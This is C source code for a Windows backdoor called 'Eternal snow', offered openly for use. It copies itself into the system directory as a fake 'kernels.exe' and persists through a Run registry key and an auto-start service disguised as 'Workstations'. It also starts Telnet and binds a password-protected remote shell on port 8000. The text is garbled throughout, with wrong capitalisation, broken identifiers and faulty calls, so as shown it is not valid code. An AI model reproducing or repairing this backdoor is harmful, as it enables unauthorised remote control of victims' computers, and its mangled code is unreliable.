Delphiscn eternal snow sans shell Version 1.0

/*

Delphiscn eternal snow sans shell Version 1.0

This backdoor is written by delphiscn. It is support for Windows NT/2000/XP/2003.
You can use a NC to control a remote computer which is runing with this software.

Complied and tested in Windows XP SP2 CN 2000/2003 not tested.

Can not run in Windows 98/me

Details

Eternal snow will create a service (workstations) on the remote system. And bind Service computer on port 8000.

Then. It will also try to start Telnet service in the remote system which is support for NT.

An attacker can control it if he konw the password -- Neverland.

Referrence

1. msdn

2.www.xfocus.org

More information

Delphiscn@www.EvilOctal.com
Cnblater (AT) Hotmail (DOT) com
Http://spaces.msn.com/members/delphiscn

*/

# Include <winsock2.h>
# Include <stdio. h>
# Include <stdlib. h>
# Include <windows. h>
# Include <winsvc. h>
# Include <psapi. h>
# Pragma comment (Lib, "psapi. lib ")
# Pragma comment (Lib, "ws2_32.lib ")

# Define password "Neverland"

Bool Reg (char * szexecfile );
Void oncreate ();
Void starttelnet ();
Void help ();

Bool Reg (char * szexecfile)
{
Hkey;
Lpctstr data_set = "software // Microsoft // windows // CurrentVersion // run //";
Long snow0 = (: regopenkeyex (HKEY_LOCAL_MACHINE, data_set, 0, key_all_access, & hkey ));
If (snow0! = Error_success) Return (false );
Lpbyte username_get = (unsigned char *) malloc (sizeof (byte) * 80 );
DWORD cbdata_1 = 80;
DWORD dwtype;
Long snow1 =: regqueryvalueex (hkey, "DLLs", 0, & dwtype, username_get, & cbdata_1 );
If (snow1! = Error_success)
{
DWORD setsize;
Setsize = strlen (szexecfile) + 1;
Dwtype = REG_SZ;
Long snow3 =: regsetvalueex (hkey, "kernels", 0, dwtype, (const unsigned char *) szexecfile, setsize );
If (snow3! = Error_success) {return (false );}
}
Free (username_get );
: Regclosekey (hkey );
Return (true );
}

Int enableprivilege (lpctstr lpszprivilegename, bool benable)
/*
Thanks to sunlion [e.s. T]
*/
{
Handle htoken;
Token_privileges TP;
Luid;
If (! Openprocesstoken (getcurrentprocess (), token_adjust_privileges |
Token_query | token_read, & htoken ))
Return 0;
If (! Lookupprivilegevalue (null, lpszprivilegename, & luid ))
Return 1;
TP. privilegecount = 1;
TP. Privileges [0]. luid = luid;
TP. Privileges [0]. Attributes = (benable )? Se_privilege_enabled: 0;
Adjusttokenprivileges (htoken, false, & TP, null );
Closehandle (htoken );
Return 0;
}

Void help ()
{
Printf ("Eternal sonw release shell in Windows NT System Support for 2000/XP/2003 version 1.0/N ");
Printf ("code by Delphiscn@www.EvilOctal.com E-mail: cnblaster (AT) Hotmail (DOT) COM/N ");
Printf ("complied in Windows XP SP2 CN 2005-08 ");
Return;
}

Int main (INT argc, char * argv [])
{
Getmodulefilename (null, argv [0], 255 );
Char sznewplace [255];
Getsystemdirectory (sznewplace, 255 );
Strcat (sznewplace, "// kernels.exe ");
If (strcmp (argv [0], sznewplace )! = 0)
{Copyfile (argv [0], sznewplace, false );}
If (! Reg (sznewplace ))
{Return 0 ;}
Oncreate ();
Starttelnet ();
System ("cls.exe ");
Help ();
Wsadata;
Char buff [4096];
Int eternal;
If (eternal = wsastartup (makeword (2, 2), & wsadata ))! = 0)
{
Printf ("wsastartup failed: % d/N", eternal );
Return-1;
}
Int Port = 8000;
Int remoteserver, localclient;
Struct sockaddr_in addrserver, addrclient;
Char * MSG = "/n/R welcome hacker ";
Char * getpass = "/R/n your password is :";
Char * passok = "/R/n OK ";
Char * error = "/R/n error password please try it again ";
Remoteserver = socket (af_inet, sock_stream, 0 );
Addrserver. sin_family = af_inet;
Addrserver. sin_port = htons (port );
Addrserver. sin_addr.s_addr = addr_any;
Int timeout = 50000;
Setsockopt (remoteserver, sol_socket, so_rcvtimeo, (char *) & timeout, sizeof (timeout ));
Uint breuser = 1;
Setsockopt (remoteserver, sol_socket, so_reuseaddr, (char *) & breuser, sizeof (breuser ));
BIND (remoteserver, (struct sockaddr *) & addrserver, sizeof (addrserver ));
Listen (remoteserver, 5 );
Printf ("BIND server is OK/n % d", Port );
Int ilen = sizeof (addrclient );
Localclient = accept (remoteserver, (struct sockaddr *) & addrclient, & ilen );
If (localclient! = Invalid_socket)
{
Int itimeout = 50000;
Setsockopt (localclient, sol_socket, so_rcvtimeo, (char *) & itimeout, sizeof (itimeout ));
}
Else return-1;
Send (localclient, MSG, strlen (MSG), 0 );
Send (localclient, getpass, strlen (getpass), 0 );
Recv (localclient, buff, 0 );
If (! (Strstr (buff, password )))
{
Send (localclient, error, strlen (error), 0 );
Printf ("/R/n Password error! ");
Closesocket (localclient );
}
Send (localclient, passok, strlen (passok), 0 );
Handle hreadpipe1, hwritepipe1, hreadpipe2, hwritepipe2;
Unsigned long lbytesread;
Security_attributes SA;
SA. nlength = 12;
SA. lpsecuritydescriptor = 0;
SA. binherithandle = true;
Createpipe (& hreadpipe1, & hwritepipe1, & SA, 0 );
Createpipe (& hreadpipe2, & hwritepipe2, & SA, 0 );
Startupinfo siinfo;
Char character line [] = "kernels.exe ";
Process_information processinformation;
Zeromemory (& siinfo, sizeof (siinfo ));
Siinfo. dwflags = startf_useshowwindow | startf_usestdhandles;
Siinfo. wshowwindow = sw_hide;
Siinfo. hstdinput = hreadpipe2;
Siinfo. hstdoutput = siinfo. hstderror = hwritepipe1;
Printf ("/R/n pipe create OK! ");
Int bread = CreateProcess (null, cmdline, null, & siinfo, & processinformation );
While (1)
{
Int ret = peeknamedpipe (hreadpipe1, buff, 1024, & lbytesread );
If (lbytesread)
{
Ret = readfile (hreadpipe1, buff, lbytesread, & lbytesread, 0 );
If (! RET) break;
Ret = Send (localclient, buff, lbytesread, 0 );
If (Ret <= 0) break;
}
Else
{

Lbytesread = Recv (localclient, buff, 1024,0 );
If (lbytesread <= 0) break;
Ret = writefile (hwritepipe2, buff, lbytesread, & lbytesread, 0 );
}
}
Closesocket (localclient );
Closesocket (remoteserver );
Return 0;
}

Void oncreate ()
{
Char sznewplace [255];
Getsystemdirectory (sznewplace, 255 );
Strcat (sznewplace, "// kernels.exe ");
Enableprivilege (se_debug_name, true );
SC _handle SCM;
SC _handle SCV;
SCM =: openscmanager (null, null, SC _manager_all_access );
If (SCM! = NULL)
{
SCV =: createservice (SCM,
"Workstations ",
"Workstations ",
Service_all_access,
Service_win32_own_process, service_interactive_process,
Service_auto_start,
Service_error_ignore,
Sznewplace,
Null, null );
If (SCV! = NULL)
{
: Closeservicehandle (SCV );
}
Else
{
: Closeservicehandle (SCM );
}
}
}

Void starttelnet ()
{
Enableprivilege (se_debug_name, true );
SC _handle SCM;
SC _handle SCV;
SCM =: openscmanager (null, null, SC _manager_all_access );
If (SCM! = NULL)
{
SCV =: openservice (SCM, "Telnet", service_all_access );
If (SCV! = NULL)
{
: Startservice (SCV, 0, null );
: Closeservicehandle (SCV );
}
: Closeservicehandle (SCM );
}
}

/*

Complied with Visual C ++. net

Good luck ^. ^

*/